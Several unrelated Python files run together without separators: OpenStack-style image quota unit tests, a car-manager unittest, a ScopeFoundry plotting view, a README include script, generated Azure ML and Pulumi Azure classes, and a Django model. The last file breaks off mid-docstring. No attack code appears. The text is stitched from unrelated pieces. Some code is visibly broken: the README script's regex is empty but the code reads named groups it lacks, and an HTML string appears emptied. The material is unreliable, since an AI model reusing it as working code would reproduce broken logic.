'status': 'active'} image = self._get_image() pre_add_locations = image.locations[:] image.locations.extend([new_location]) pre_add_locations.extend([new_location]) self.assertEqual(image.locations, pre_add_locations) def test_iadd_location(self): new_location = {'url': 'file:///a/path', 'metadata': {}, 'status': 'active'} image = self._get_image() pre_add_locations = image.locations[:] image.locations += [new_location] pre_add_locations += [new_location] self.assertEqual(image.locations, pre_add_locations) def test_set_location(self): new_location = {'url': 'file:///a/path', 'metadata': {}, 'status': 'active'} image = self._get_image() image.locations = [new_location] self.assertEqual(image.locations, [new_location]) def _make_image_with_quota(self, image_size=10, location_count=2): quota = image_size * location_count self.config(user_storage_quota=str(quota)) return self._get_image(image_size=image_size, location_count=location_count) def test_exceed_append_location(self): image = self._make_image_with_quota() self.assertRaises(exception.StorageQuotaFull, image.locations.append, {'url': 'file:///a/path', 'metadata': {}, 'status': 'active'}) def test_exceed_insert_location(self): image = self._make_image_with_quota() self.assertRaises(exception.StorageQuotaFull, image.locations.insert, 0, {'url': 'file:///a/path', 'metadata': {}, 'status': 'active'}) def test_exceed_extend_location(self): image = self._make_image_with_quota() self.assertRaises(exception.StorageQuotaFull, image.locations.extend, [{'url': 'file:///a/path', 'metadata': {}, 'status': 'active'}]) def test_set_location_under(self): image = self._make_image_with_quota(location_count=1) image.locations = [{'url': 'file:///a/path', 'metadata': {}, 'status': 'active'}] def test_set_location_exceed(self): image = self._make_image_with_quota(location_count=1) try: image.locations = [{'url': 'file:///a/path', 'metadata': {}, 'status': 'active'}, {'url': 'file:///a/path2', 'metadata': {}, 'status': 'active'}] self.fail('Should have raised the quota exception') except exception.StorageQuotaFull: pass def 
test_iadd_location_exceed(self): image = self._make_image_with_quota(location_count=1) try: image.locations += [{'url': 'file:///a/path', 'metadata': {}, 'status': 'active'}] self.fail('Should have raised the quota exception') except exception.StorageQuotaFull: pass def test_append_location_for_queued_image(self): context = FakeContext() db_api = unit_test_utils.FakeDB() store_api = unit_test_utils.FakeStoreAPI() store = unit_test_utils.FakeStoreUtils(store_api) base_image = FakeImage() base_image.image_id = str(uuid.uuid4()) image = xmonitor.quota.ImageProxy(base_image, context, db_api, store) self.assertIsNone(image.size) self.stubs.Set(store_api, 'get_size_from_backend', unit_test_utils.fake_get_size_from_backend) image.locations.append({'url': 'file:///fake.img.tar.gz', 'metadata': {}}) self.assertIn({'url': 'file:///fake.img.tar.gz', 'metadata': {}}, image.locations) def test_insert_location_for_queued_image(self): context = FakeContext() db_api = unit_test_utils.FakeDB() store_api = unit_test_utils.FakeStoreAPI() store = unit_test_utils.FakeStoreUtils(store_api) base_image = FakeImage() base_image.image_id = str(uuid.uuid4()) image = xmonitor.quota.ImageProxy(base_image, context, db_api, store) self.assertIsNone(image.size) self.stubs.Set(store_api, 'get_size_from_backend', unit_test_utils.fake_get_size_from_backend) image.locations.insert(0, {'url': 'file:///fake.img.tar.gz', 'metadata': {}}) self.assertIn({'url': 'file:///fake.img.tar.gz', 'metadata': {}}, image.locations) def test_set_location_for_queued_image(self): context = FakeContext() db_api = unit_test_utils.FakeDB() store_api = unit_test_utils.FakeStoreAPI() store = unit_test_utils.FakeStoreUtils(store_api) base_image = FakeImage() base_image.image_id = str(uuid.uuid4()) image = xmonitor.quota.ImageProxy(base_image, context, db_api, store) self.assertIsNone(image.size) self.stubs.Set(store_api, 'get_size_from_backend', unit_test_utils.fake_get_size_from_backend) image.locations = [{'url': 'file:///fake.img.tar.gz', 'metadata': {}}] self.assertEqual([{'url': 'file:///fake.img.tar.gz', 'metadata': {}}], image.locations) def test_iadd_location_for_queued_image(self): context = FakeContext() db_api = unit_test_utils.FakeDB() store_api = unit_test_utils.FakeStoreAPI() store = unit_test_utils.FakeStoreUtils(store_api) base_image = FakeImage() base_image.image_id = str(uuid.uuid4()) image = xmonitor.quota.ImageProxy(base_image, context, db_api, store) self.assertIsNone(image.size) self.stubs.Set(store_api, 'get_size_from_backend', unit_test_utils.fake_get_size_from_backend) image.locations += [{'url': 'file:///fake.img.tar.gz', 'metadata': {}}] self.assertIn({'url': 'file:///fake.img.tar.gz', 'metadata': {}}, image.locations) class TestImagePropertyQuotas(test_utils.BaseTestCase): def setUp(self): super(TestImagePropertyQuotas, self).setUp() self.base_image = FakeImage() self.image = xmonitor.quota.ImageProxy(self.base_image, mock.Mock(), mock.Mock(), mock.Mock()) self.image_repo_mock = mock.Mock() self.image_repo_mock.add.return_value = self.base_image self.image_repo_mock.save.return_value = self.base_image self.image_repo_proxy = xmonitor.quota.ImageRepoProxy( self.image_repo_mock, mock.Mock(), mock.Mock(), mock.Mock()) def test_save_image_with_image_property(self): self.config(image_property_quota=1) self.image.extra_properties = {'foo': 'bar'} self.image_repo_proxy.save(self.image) self.image_repo_mock.save.assert_called_once_with(self.base_image, from_state=None) def test_save_image_too_many_image_properties(self): 
self.config(image_property_quota=1) self.image.extra_properties = {'foo': 'bar', 'foo2': 'bar2'} exc = self.assertRaises(exception.ImagePropertyLimitExceeded, self.image_repo_proxy.save, self.image) self.assertIn("Attempted: 2, Maximum: 1", encodeutils.exception_to_unicode(exc)) def test_save_image_unlimited_image_properties(self): self.config(image_property_quota=-1) self.image.extra_properties = {'foo': 'bar'} self.image_repo_proxy.save(self.image) self.image_repo_mock.save.assert_called_once_with(self.base_image, from_state=None) def test_add_image_with_image_property(self): self.config(image_property_quota=1) self.image.extra_properties = {'foo': 'bar'} self.image_repo_proxy.add(self.image) self.image_repo_mock.add.assert_called_once_with(self.base_image) def test_add_image_too_many_image_properties(self): self.config(image_property_quota=1) self.image.extra_properties = {'foo': 'bar', 'foo2': 'bar2'} exc = self.assertRaises(exception.ImagePropertyLimitExceeded, self.image_repo_proxy.add, self.image) self.assertIn("Attempted: 2, Maximum: 1", encodeutils.exception_to_unicode(exc)) def test_add_image_unlimited_image_properties(self): self.config(image_property_quota=-1) self.image.extra_properties = {'foo': 'bar'} self.image_repo_proxy.add(self.image) self.image_repo_mock.add.assert_called_once_with(self.base_image) def _quota_exceed_setup(self): self.config(image_property_quota=2) self.base_image.extra_properties = {'foo': 'bar', 'spam': 'ham'} self.image = xmonitor.quota.ImageProxy(self.base_image, mock.Mock(), mock.Mock(), mock.Mock()) def test_modify_image_properties_when_quota_exceeded(self): self._quota_exceed_setup() self.config(image_property_quota=1) self.image.extra_properties = {'foo': 'frob', 'spam': 'eggs'} self.image_repo_proxy.save(self.image) self.image_repo_mock.save.assert_called_once_with(self.base_image, from_state=None) self.assertEqual('frob', self.base_image.extra_properties['foo']) self.assertEqual('eggs', self.base_image.extra_properties['spam']) def test_delete_image_properties_when_quota_exceeded(self): self._quota_exceed_setup() self.config(image_property_quota=1) del self.image.extra_properties['foo'] self.image_repo_proxy.save(self.image) self.image_repo_mock.save.assert_called_once_with(self.base_image, from_state=None) self.assertNotIn('foo', self.base_image.extra_properties) self.assertEqual('ham', self.base_image.extra_properties['spam']) def test_invalid_quota_config_parameter(self): self.config(user_storage_quota='foo') location = {"url": "file:///fake.img.tar.gz", "metadata": {}} self.assertRaises(exception.InvalidOptionValue, self.image.locations.append, location) def test_exceed_quota_during_patch_operation(self): self._quota_exceed_setup() self.image.extra_properties['frob'] = 'baz' self.image.extra_properties['lorem'] = 'ipsum' self.assertEqual('bar', self.base_image.extra_properties['foo']) self.assertEqual('ham', self.base_image.extra_properties['spam']) self.assertEqual('baz', self.base_image.extra_properties['frob']) self.assertEqual('ipsum', self.base_image.extra_properties['lorem']) del self.image.extra_properties['frob'] del self.image.extra_properties['lorem'] self.image_repo_proxy.save(self.image) call_args = mock.call(self.base_image, from_state=None) self.assertEqual(call_args, self.image_repo_mock.save.call_args) self.assertEqual('bar', self.base_image.extra_properties['foo']) self.assertEqual('ham', self.base_image.extra_properties['spam']) self.assertNotIn('frob', self.base_image.extra_properties) self.assertNotIn('lorem', 
self.base_image.extra_properties) def test_quota_exceeded_after_delete_image_properties(self): self.config(image_property_quota=3) self.base_image.extra_properties = {'foo': 'bar', 'spam': 'ham', 'frob': 'baz'} self.image = xmonitor.quota.ImageProxy(self.base_image, mock.Mock(), mock.Mock(), mock.Mock()) self.config(image_property_quota=1) del self.image.extra_properties['foo'] self.image_repo_proxy.save(self.image) self.image_repo_mock.save.assert_called_once_with(self.base_image, from_state=None) self.assertNotIn('foo', self.base_image.extra_properties) self.assertEqual('ham', self.base_image.extra_properties['spam']) self.assertEqual('baz', self.base_image.extra_properties['frob']) class TestImageTagQuotas(test_utils.BaseTestCase): def setUp(self): super(TestImageTagQuotas, self).setUp() self.base_image = mock.Mock() self.base_image.tags = set([]) self.base_image.extra_properties = {} self.image = xmonitor.quota.ImageProxy(self.base_image, mock.Mock(), mock.Mock(), mock.Mock()) self.image_repo_mock = mock.Mock() self.image_repo_proxy = xmonitor.quota.ImageRepoProxy( self.image_repo_mock, mock.Mock(), mock.Mock(), mock.Mock()) def test_replace_image_tag(self): self.config(image_tag_quota=1) self.image.tags = ['foo'] self.assertEqual(1, len(self.image.tags)) def test_replace_too_many_image_tags(self): self.config(image_tag_quota=0) exc = self.assertRaises(exception.ImageTagLimitExceeded, setattr, self.image, 'tags', ['foo', 'bar']) self.assertIn('Attempted: 2, Maximum: 0', encodeutils.exception_to_unicode(exc)) self.assertEqual(0, len(self.image.tags)) def test_replace_unlimited_image_tags(self): self.config(image_tag_quota=-1) self.image.tags = ['foo'] self.assertEqual(1, len(self.image.tags)) def test_add_image_tag(self): self.config(image_tag_quota=1) self.image.tags.add('foo') self.assertEqual(1, len(self.image.tags)) def test_add_too_many_image_tags(self): self.config(image_tag_quota=1) self.image.tags.add('foo') exc = self.assertRaises(exception.ImageTagLimitExceeded, self.image.tags.add, 'bar') self.assertIn('Attempted: 2, Maximum: 1', encodeutils.exception_to_unicode(exc)) def test_add_unlimited_image_tags(self): self.config(image_tag_quota=-1) self.image.tags.add('foo') self.assertEqual(1, len(self.image.tags)) def test_remove_image_tag_while_over_quota(self): self.config(image_tag_quota=1) self.image.tags.add('foo') self.assertEqual(1, len(self.image.tags)) self.config(image_tag_quota=0) self.image.tags.remove('foo') self.assertEqual(0, len(self.image.tags)) class TestQuotaImageTagsProxy(test_utils.BaseTestCase): def setUp(self): super(TestQuotaImageTagsProxy, self).setUp() def test_add(self): proxy = xmonitor.quota.QuotaImageTagsProxy(set([])) proxy.add('foo') self.assertIn('foo', proxy) def test_add_too_many_tags(self): self.config(image_tag_quota=0) proxy = xmonitor.quota.QuotaImageTagsProxy(set([])) exc = self.assertRaises(exception.ImageTagLimitExceeded, proxy.add, 'bar') self.assertIn('Attempted: 1, Maximum: 0', encodeutils.exception_to_unicode(exc)) def test_equals(self): proxy = xmonitor.quota.QuotaImageTagsProxy(set([])) self.assertEqual(set([]), proxy) def test_contains(self): proxy = xmonitor.quota.QuotaImageTagsProxy(set(['foo'])) self.assertIn('foo', proxy) def test_len(self): proxy = xmonitor.quota.QuotaImageTagsProxy(set(['foo', 'bar', 'baz', 'niz'])) self.assertEqual(4, len(proxy)) def test_iter(self): items = set(['foo', 'bar', 'baz', 'niz']) proxy = xmonitor.quota.QuotaImageTagsProxy(items.copy()) self.assertEqual(4, len(items)) for item in proxy: 
items.remove(item) self.assertEqual(0, len(items)) class TestImageMemberQuotas(test_utils.BaseTestCase): def setUp(self): super(TestImageMemberQuotas, self).setUp() db_api = unit_test_utils.FakeDB() store_api = unit_test_utils.FakeStoreAPI() store = unit_test_utils.FakeStoreUtils(store_api) context = FakeContext() self.image = mock.Mock() self.base_image_member_factory = mock.Mock() self.image_member_factory = xmonitor.quota.ImageMemberFactoryProxy( self.base_image_member_factory, context, db_api, store) def test_new_image_member(self): self.config(image_member_quota=1) self.image_member_factory.new_image_member(self.image, 'fake_id') nim = self.base_image_member_factory.new_image_member nim.assert_called_once_with(self.image, 'fake_id') def test_new_image_member_unlimited_members(self): self.config(image_member_quota=-1) self.image_member_factory.new_image_member(self.image, 'fake_id') nim = self.base_image_member_factory.new_image_member nim.assert_called_once_with(self.image, 'fake_id') def test_new_image_member_too_many_members(self): self.config(image_member_quota=0) self.assertRaises(exception.ImageMemberLimitExceeded, self.image_member_factory.new_image_member, self.image, 'fake_id') class TestImageLocationQuotas(test_utils.BaseTestCase): def setUp(self): super(TestImageLocationQuotas, self).setUp() self.base_image = mock.Mock() self.base_image.locations = [] self.base_image.size = 1 self.base_image.extra_properties = {} self.image = xmonitor.quota.ImageProxy(self.base_image, mock.Mock(), mock.Mock(), mock.Mock()) self.image_repo_mock = mock.Mock() self.image_repo_proxy = xmonitor.quota.ImageRepoProxy( self.image_repo_mock, mock.Mock(), mock.Mock(), mock.Mock()) def test_replace_image_location(self): self.config(image_location_quota=1) self.image.locations = [{"url": "file:///fake.img.tar.gz", "metadata": {} }] self.assertEqual(1, len(self.image.locations)) def test_replace_too_many_image_locations(self): self.config(image_location_quota=1) self.image.locations = [{"url": "file:///fake.img.tar.gz", "metadata": {}} ] locations = [ {"url": "file:///fake1.img.tar.gz", "metadata": {}}, {"url": "file:///fake2.img.tar.gz", "metadata": {}}, {"url": "file:///fake3.img.tar.gz", "metadata": {}} ] exc = self.assertRaises(exception.ImageLocationLimitExceeded, setattr, self.image, 'locations', locations) self.assertIn('Attempted: 3, Maximum: 1', encodeutils.exception_to_unicode(exc)) self.assertEqual(1, len(self.image.locations)) def test_replace_unlimited_image_locations(self): self.config(image_location_quota=-1) self.image.locations = [{"url": "file:///fake.img.tar.gz", "metadata": {}} ] self.assertEqual(1, len(self.image.locations)) def test_add_image_location(self): self.config(image_location_quota=1) location = {"url": "file:///fake.img.tar.gz", "metadata": {}} self.image.locations.append(location) self.assertEqual(1, len(self.image.locations)) def test_add_too_many_image_locations(self): self.config(image_location_quota=1) location1 = {"url": "file:///fake1.img.tar.gz", "metadata": {}} self.image.locations.append(location1) location2 = {"url": "file:///fake2.img.tar.gz", "metadata": {}} exc = self.assertRaises(exception.ImageLocationLimitExceeded, self.image.locations.append, location2) self.assertIn('Attempted: 2, Maximum: 1', encodeutils.exception_to_unicode(exc)) def test_add_unlimited_image_locations(self): self.config(image_location_quota=-1) location1 = {"url": "file:///fake1.img.tar.gz", "metadata": {}} self.image.locations.append(location1) self.assertEqual(1, 
len(self.image.locations)) def test_remove_image_location_while_over_quota(self): self.config(image_location_quota=1) location1 = {"url": "file:///fake1.img.tar.gz", "metadata": {}} self.image.locations.append(location1) self.assertEqual(1, len(self.image.locations)) self.config(image_location_quota=0) self.image.locations.remove(location1) self.assertEqual(0, len(self.image.locations)) import unittest from LAB_TESTING.CarManager.car_manager import Car class TestCar(unittest.TestCase): def setUp(self): self.car = Car('Car', 'Shkoda', 1, 30) def test_set_up(self): self.assertEqual(self.car.make, 'Car') self.assertEqual(self.car.model, 'Shkoda') self.assertEqual(self.car.fuel_consumption, 1) self.assertEqual(self.car.fuel_capacity, 30) self.assertEqual(self.car.fuel_amount, 0) def test_make_return_result(self): self.assertEqual(self.car.make, 'Car') def test_make_setter_raise_exception_if_not_value(self): with self.assertRaises(Exception) as ex: self.car.make = '' self.assertEqual(str(ex.exception), "Make cannot be null or empty!") def test_make_setter_change_value(self): self.car.make = 'car' self.assertEqual(self.car.make, 'car') def test_model_should_raise_exception_when_is_empty(self): with self.assertRaises(Exception) as ex: self.car.model = '' self.assertEqual(str(ex.exception), "Model cannot be null or empty!") def test_model_change_when_value_is_not_empty(self): self.car.model = 'Opel' self.assertEqual(self.car.model, 'Opel') def test_fuel_consumption_return(self): self.assertEqual(self.car.fuel_consumption, 1) def test_fuel_consumption_raise_exception_if_value_is_less_or_equal_to_zero(self): with self.assertRaises(Exception) as ex: self.car.fuel_consumption = 0 self.assertEqual(str(ex.exception), "Fuel consumption cannot be zero or negative!") with self.assertRaises(Exception) as ex: self.car.fuel_consumption = -10 self.assertEqual(str(ex.exception), "Fuel consumption cannot be zero or negative!") def test_fuel_capacist(self): self.assertEqual(self.car.fuel_capacity, 30) def test_fuel_capacity_raise_ex_when_less_or_equal_to_zeor(self): with self.assertRaises(Exception) as ex: self.car.fuel_capacity = 0 self.assertEqual(str(ex.exception), "Fuel capacity cannot be zero or negative!") with self.assertRaises(Exception) as ex: self.car.fuel_capacity = -10 self.assertEqual(str(ex.exception), "Fuel capacity cannot be zero or negative!") def test_fuel_amount(self): self.assertEqual(self.car.fuel_amount, 0) def test_fuel_ammount_should_raise_exceptipon_when_is_less_then_zero(self): with self.assertRaises(Exception) as ex: self.car.fuel_amount = -10 self.assertEqual(str(ex.exception), "Fuel amount cannot be negative!") def test_fuel_ammount_change_when_not_less_then_zero(self): self.car.fuel_amount = 10 self.assertEqual(self.car.fuel_amount, 10) def test_refuel_raise_exception_when_try_to_refuel_with_negative_or_zero_value(self): with self.assertRaises(Exception) as ex: self.car.refuel(0) self.assertEqual(str(ex.exception), "Fuel amount cannot be zero or negative!") with self.assertRaises(Exception) as ex: self.car.refuel(-10) self.assertEqual(str(ex.exception), "Fuel amount cannot be zero or negative!") def test_refuel_change_value(self): self.car.refuel(10) self.assertEqual(self.car.fuel_amount, 10) def test_refuel_when_more_then_fuel_capacity_return_capacity_value(self): self.car.refuel(40) self.assertEqual(self.car.fuel_amount, 30) def test_drive_raise_exception_when_fuel_is_not_enought(self): with self.assertRaises(Exception) as ex: self.car.drive(100) self.assertEqual(str(ex.exception), 
"You don't have enough fuel to drive!") def test_drive_decrease_value_when_distance_is_ok_to_car(self): self.car.fuel_amount = 1 self.car.drive(10) self.assertEqual(self.car.fuel_amount, 0.9) if __name__ == '__main__': unittest.main()ScopeFoundry/FoundryDataBrowser from ScopeFoundry.data_browser import DataBrowserView import pyqtgraph as pg from qtpy import QtWidgets import numpy as np class PowerScanNPZView(DataBrowserView): name = 'power_scan_npz' def is_file_supported(self, fname): return('power_scan' in fname) and ('.npz' in fname) def setup(self): self.settings.New('spec_index', dtype=int, initial=0) self.ui = QtWidgets.QGroupBox() self.ui.setLayout(QtWidgets.QVBoxLayout()) self.ui.spec_index_doubleSpinBox = QtWidgets.QDoubleSpinBox() self.settings.spec_index.connect_bidir_to_widget(self.ui.spec_index_doubleSpinBox) self.ui.layout().addWidget(self.ui.spec_index_doubleSpinBox) self.graph_layout = pg.GraphicsLayoutWidget() self.ui.layout().addWidget(self.graph_layout) self.power_plot = self.graph_layout.addPlot() self.power_plot.setLogMode(x=True, y=True) self.power_plotcurve = self.power_plot.plot([1],[1], name='Data') self.power_fit_plotcurve = self.power_plot.plot([1],[1],pen='r', name='Fit') self.power_plot_arrow = pg.ArrowItem() self.power_plot_arrow.setPos(0,0) self.power_plot.addItem(self.power_plot_arrow) self.power_plot_lr = pg.LinearRegionItem([1,2]) self.power_plot_lr.setZValue(-10) self.power_plot.addItem(self.power_plot_lr) self.power_plot_lr.sigRegionChanged.connect(self.redo_fit) #self.power_plot_legend = pg.LegendItem() #self.power_plot.addItem(self.power_plot_legend) #self.power_plot_legend.addItem(self.power_plotcurve) #self.power_plot_legend.addItem(self.power_fit_plotcurve) self.fit_text = pg.TextItem("fit") self.fit_text.setParentItem(self.power_plot_lr, ) self.graph_layout.nextRow() self.spec_plot = self.graph_layout.addPlot() self.spec_plotcurve = self.spec_plot.plot([0]) self.settings.spec_index.add_listener(self.on_spec_index_change) def on_change_data_filename(self, fname=None): if fname == "0": return try: dat = self.dat = np.load(fname) self.settings.spec_index.change_min_max(0, len(dat['power_meter_power'])-1) if 'time_traces' in self.dat: self.data_avail = True self.power_plot_y = np.sum(dat['time_traces'], axis=1) self.power_plot.setLabel('left', 'Total Intensity', units='counts') self.power_plot.setLabel('bottom', 'Power', units='W') cr0 = self.dat['picoharp_count_rate0'] rep_period_s = 1.0/cr0 time_bin_resolution = self.dat['picoharp_Resolution']*1e-12 self.num_hist_chans = int(np.ceil(rep_period_s/time_bin_resolution)) self.spec_plot.setLogMode(False, True) self.spec_plot.setLabel('left', 'Intensity', units='counts') self.spec_plot.setLabel('bottom', 'time', units='ns') elif 'integrated_spectra' in self.dat: self.data_avail = True self.power_plot_y = np.array(dat['integrated_spectra']) else: self.data_avail = False self.power_plotcurve.setData(dat['power_meter_power']) if self.data_avail: # to fix issues with log-log plotting, we shift negative data if np.any(self.power_plot_y < 0): self.power_plot_y -= np.min(self.power_plot_y) - 1 x = dat['power_meter_power'] self.power_plotcurve.setData(x, self.power_plot_y) try: self.redo_fit() except Exception as err: print("failed to fit", err) self.settings['spec_index'] = 0 self.on_spec_index_change() except Exception as err: self.databrowser.ui.statusbar.showMessage("failed to load %s:\n%s" %(fname, err)) raise(err) def on_spec_index_change(self): ii = self.settings['spec_index'] H = self.dat if 'time_traces' 
in self.dat: self.spec_plotcurve.setData(H['time_array'][:self.num_hist_chans], 1+H['time_traces'][ii,:self.num_hist_chans]) if 'integrated_spectra' in H: print(H['power_meter_power'][ii], H['integrated_spectra'][ii]) if 'spectra' in H: self.spec_plotcurve.setData(H['wls'], H['spectra'][ii]) if self.data_avail: self.power_plot_arrow.setPos(np.log10(H['power_meter_power'][ii]), np.log10(self.power_plot_y[ii])) def redo_fit(self): lx0, lx1 = self.power_plot_lr.getRegion() x0, x1 = 10**lx0, 10**lx1 X = self.dat['power_meter_power'] n = len(X) ii0 = np.argmin(np.abs(X[:n//2+1]-x0)) ii1 = np.argmin(np.abs(X[:n//2+1]-x1)) print(ii0,ii1) m, b = np.polyfit(np.log10(X[ii0:ii1]), np.log10(self.power_plot_y[ii0:ii1]), deg=1) print("fit", m,b) fit_data = 10**(np.poly1d((m,b))(np.log10(X))) print("fit_data", fit_data) self.power_fit_plotcurve.setData(X, fit_data) self.fit_text.setHtml("
I{:1.2f}
".format(m)) self.fit_text.setPos(0.5*(lx0+lx1), np.log10(fit_data[(ii0+ii1)//2]))#!/usr/bin/env python3 import os import re include_pattern = r'^$' readme_location = os.path.dirname(__file__) + '/../README.md.tpl' readme_replaced = '' with open(readme_location, 'r') as readme: readme_contents = readme.read() readme_replacements = [] for m in re.finditer(include_pattern, readme_contents, flags=re.MULTILINE): (content_start, content_end) = m.span() replacement = { 'start': content_start, 'end': content_end, 'format': m.group('format'), 'file': m.group('include_file') } readme_replacements.append(replacement) last_replacement_index = 0 for replacement in readme_replacements: readme_replaced += readme_contents[last_replacement_index:replacement['start']] readme_replaced += '\n```' + replacement['format'] + '\n' with open(replacement['file']) as f: readme_replaced += f.read() readme_replaced += '```\n' last_replacement_index = replacement['end'] readme_replaced += readme_contents[last_replacement_index:-1] with open('README.md', 'r+') as f: old_readme = f.read() f.seek(0) f.write(readme_replaced) f.truncate() if old_readme != readme_replaced: print('README.md modified') exit(1) else: exit(0) 0 # coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator 2.3.33.0 # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msrest.serialization import Model class Model(Model): """An Azure Machine Learning Model. :param id: The Model Id. :type id: str :param name: The Model name. :type name: str :param framework: The Model framework. :type framework: str :param framework_version: The Model framework version. :type framework_version: str :param version: The Model version assigned by Model Management Service. :type version: long :param datasets: The list of datasets associated with the model. :type datasets: list[~_restclient.models.DatasetReference] :param url: The URL of the Model. Usually a SAS URL. :type url: str :param mime_type: The MIME type of Model content. For more details about MIME type, please open https://www.iana.org/assignments/media-types/media-types.xhtml :type mime_type: str :param description: The Model description text. :type description: str :param created_time: The Model creation time (UTC). :type created_time: datetime :param modified_time: The Model last modified time (UTC). :type modified_time: datetime :param unpack: Indicates whether we need to unpack the Model during docker Image creation. :type unpack: bool :param parent_model_id: The Parent Model Id. :type parent_model_id: str :param run_id: The RunId that created this model. :type run_id: str :param experiment_name: The name of the experiment where this model was created. :type experiment_name: str :param kv_tags: The Model tag dictionary. Items are mutable. :type kv_tags: dict[str, str] :param properties: The Model property dictionary. Properties are immutable. :type properties: dict[str, str] :param derived_model_ids: Models dervied from this model :type derived_model_ids: list[str] :param sample_input_data: Sample Input Data for the Model. 
A reference to a dataset in the workspace in the format aml://dataset/{datasetId} :type sample_input_data: str :param sample_output_data: Sample Output Data for the Model. A reference to a dataset in the workspace in the format aml://dataset/{datasetId} :type sample_output_data: str :param resource_requirements: Resource requirements for the model :type resource_requirements: ~_restclient.models.ModelResourceRequirements :param created_by: The User who created this entity. :type created_by: ~_restclient.models.ModelCreatedBy """ _validation = { 'name': {'required': True}, 'url': {'required': True}, 'mime_type': {'required': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'framework': {'key': 'framework', 'type': 'str'}, 'framework_version': {'key': 'frameworkVersion', 'type': 'str'}, 'version': {'key': 'version', 'type': 'long'}, 'datasets': {'key': 'datasets', 'type': '[DatasetReference]'}, 'url': {'key': 'url', 'type': 'str'}, 'mime_type': {'key': 'mimeType', 'type': 'str'}, 'description': {'key': 'description', 'type': 'str'}, 'created_time': {'key': 'createdTime', 'type': 'iso-8601'}, 'modified_time': {'key': 'modifiedTime', 'type': 'iso-8601'}, 'unpack': {'key': 'unpack', 'type': 'bool'}, 'parent_model_id': {'key': 'parentModelId', 'type': 'str'}, 'run_id': {'key': 'runId', 'type': 'str'}, 'experiment_name': {'key': 'experimentName', 'type': 'str'}, 'kv_tags': {'key': 'kvTags', 'type': '{str}'}, 'properties': {'key': 'properties', 'type': '{str}'}, 'derived_model_ids': {'key': 'derivedModelIds', 'type': '[str]'}, 'sample_input_data': {'key': 'sampleInputData', 'type': 'str'}, 'sample_output_data': {'key': 'sampleOutputData', 'type': 'str'}, 'resource_requirements': {'key': 'resourceRequirements', 'type': 'ModelResourceRequirements'}, 'created_by': {'key': 'createdBy', 'type': 'ModelCreatedBy'}, } def __init__(self, name, url, mime_type, id=None, framework=None, framework_version=None, version=None, datasets=None, description=None, created_time=None, modified_time=None, unpack=None, parent_model_id=None, run_id=None, experiment_name=None, kv_tags=None, properties=None, derived_model_ids=None, sample_input_data=None, sample_output_data=None, resource_requirements=None, created_by=None): super(Model, self).__init__() self.id = id self.name = name self.framework = framework self.framework_version = framework_version self.version = version self.datasets = datasets self.url = url self.mime_type = mime_type self.description = description self.created_time = created_time self.modified_time = modified_time self.unpack = unpack self.parent_model_id = parent_model_id self.run_id = run_id self.experiment_name = experiment_name self.kv_tags = kv_tags self.properties = properties self.derived_model_ids = derived_model_ids self.sample_input_data = sample_input_data self.sample_output_data = sample_output_data self.resource_requirements = resource_requirements self.created_by = created_by import uuid from django.conf import settings from django.db import models from django.contrib.contenttypes.fields import GenericRelation from behaviors.behaviors import Timestamped import tldextract from linkanywhere.apps.base.behaviors import Published from linkanywhere.apps.likes.models import Like class Link(Published, Timestamped, models.Model): id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False) owner = models.ForeignKey( settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='links' ) title = 
models.CharField(max_length=200) url = models.URLField() description = models.TextField() likes = GenericRelation(Like) category = models.ForeignKey( 'categories.Category', on_delete=models.CASCADE, related_name='links' ) tags = models.ManyToManyField( 'tags.Tag', related_name='links' ) class Meta: ordering = ('-publication_date', '-created', 'title') def __str__(self): return '{0}: {1}'.format(self.title, self.url) @property def total_likes(self): return self.likes.count() def get_url_domain(self): """ Extract root domain and top-level domain from URL. """ ext = tldextract.extract(self.url) return '{}.{}'.format(ext.domain, ext.suffix) 0 # coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union from .. import _utilities, _tables __all__ = ['DataExportRule'] class DataExportRule(pulumi.CustomResource): def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, destination_resource_id: Optional[pulumi.Input[str]] = None, enabled: Optional[pulumi.Input[bool]] = None, name: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, table_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, workspace_resource_id: Optional[pulumi.Input[str]] = None, __props__=None, __name__=None, __opts__=None): """ Manages a Log Analytics Data Export Rule. ## Example Usage ```python import pulumi import pulumi_azure as azure example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe") example_analytics_workspace = azure.operationalinsights.AnalyticsWorkspace("exampleAnalyticsWorkspace", location=example_resource_group.location, resource_group_name=example_resource_group.name, sku="PerGB2018", retention_in_days=30) example_account = azure.storage.Account("exampleAccount", resource_group_name=example_resource_group.name, location=example_resource_group.location, account_tier="Standard", account_replication_type="LRS") example_data_export_rule = azure.loganalytics.DataExportRule("exampleDataExportRule", resource_group_name=example_resource_group.name, workspace_resource_id=example_analytics_workspace.id, destination_resource_id=example_account.id, table_names=["Heartbeat"]) ``` ## Import Log Analytics Data Export Rule can be imported using the `resource id`, e.g. ```sh $ pulumi import azure:loganalytics/dataExportRule:DataExportRule example /subscriptions/00000000-0000-0000-0000-000000000000/resourcegroups/group1/providers/Microsoft.OperationalInsights/workspaces/workspace1/dataExports/dataExport1 ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] destination_resource_id: The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically. :param pulumi.Input[bool] enabled: Is this Log Analytics Data Export Rule when enabled? Possible values include `true` or `false`. Defaults to `false`. :param pulumi.Input[str] name: The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created. 
